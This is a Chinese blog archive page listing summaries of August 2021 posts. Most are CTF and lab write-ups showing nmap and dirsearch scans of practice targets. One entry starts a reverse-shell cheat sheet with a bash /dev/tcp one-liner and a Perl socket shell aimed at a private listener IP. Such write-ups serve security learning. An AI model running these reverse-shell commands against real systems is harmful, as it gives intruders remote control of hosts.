08 2021 档案

摘要:扫出来了一个mail目录,看到一个contact_me.php文件还以为可以读源码了 lao@laolao:~$ dirsearch -u http://142.93.35.92:30787/ _|. _ _ _ _ _ _|_ v0.4.1 (_||| _) (/_(_|| (_| ) Exten 阅读全文
posted @ 2021-08-17 16:57 东坡肉肉君 阅读(58) 评论(0) 推荐(0) 编辑
摘要:一开始扫了一下端口,发现了30951端口,浏览器打开后没有什么特别的,然后就按照题目提示写了,跟以前做的一个叫秋名山神的题目很像,就拿python跑了一个 lao@laolao:~$ sudo nmap -sS -Pn -A 188.166.173.208 Host discovery disabl 阅读全文
posted @ 2021-08-17 01:41 东坡肉肉君 阅读(131) 评论(0) 推荐(0) 编辑
摘要:正文 nmap扫描结束,看到了不寻常的88和389端口,88端口运行着Kerberos服务,389端口运行着LDAP服务(轻型目录访问协议),Kerberos是一种计算机网络授权协议,用来在非安全网络中,对个人通信以安全的手段进行身份认证。LDAP是基于客户/服务器模式的目录数据库。 lao@lao 阅读全文
posted @ 2021-08-15 14:59 东坡肉肉君 阅读(889) 评论(0) 推荐(0) 编辑
摘要:正文 普普通通的端口,直接访问试试,就一个window server的初试界面,没啥思路,直接上工具 lao@laolao:~/桌面$ sudo nmap -sS -Pn -A 10.10.10.29 Host discovery disabled (-Pn). All addresses will 阅读全文
posted @ 2021-08-12 22:45 东坡肉肉君 阅读(443) 评论(0) 推荐(0) 编辑
摘要:反弹shell bash -c 'bash -i >& /dev/tcp/192.168.1.102/4444 0>&1' perl -e 'use Socket;i="192.168.1.102";p=4555;socket(S,PF_INET,SOCK_STREAM,getprotobyna 阅读全文
posted @ 2021-08-12 21:19 东坡肉肉君 阅读(569) 评论(0) 推荐(0) 编辑
摘要:正文 端口扫描,更上一题差不多,多了一个ftp lao@laolao:~$ sudo nmap -sS -Pn 10.10.10.46 [sudo] lao 的密码: Host discovery disabled (-Pn). All addresses will be marked 'up' a 阅读全文
posted @ 2021-08-11 20:27 东坡肉肉君 阅读(928) 评论(0) 推荐(0) 编辑
该文被密码保护。
posted @ 2021-08-11 14:46 东坡肉肉君 阅读(1) 评论(0) 推荐(0) 编辑
摘要:正文 User 扫一下端口趴 sudo nmap -sS -A -Pn 10.10.10.28 这个有个80端口开放着尝试访问一下网站,发现了一个登录入口 上sqlmap打一下,当然不用尝试了,打了一下午没打通,dirseacrh也没有什么结果,查了wp才知道这里的密码跟上一题通用的:admin,M 阅读全文
posted @ 2021-08-10 18:49 东坡肉肉君 阅读(172) 评论(0) 推荐(0) 编辑
摘要:获得4个开放端口,挨个试试趴 lao@laolao:~/桌面$ nmap -PS 10.10.10.27 Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-09 19:06 CST Nmap scan report for localhost (1 阅读全文
posted @ 2021-08-09 19:30 东坡肉肉君 阅读(488) 评论(0) 推荐(0) 编辑
该文被密码保护。
posted @ 2021-08-08 23:41 东坡肉肉君 编辑

点击右上角即可分享
微信分享提示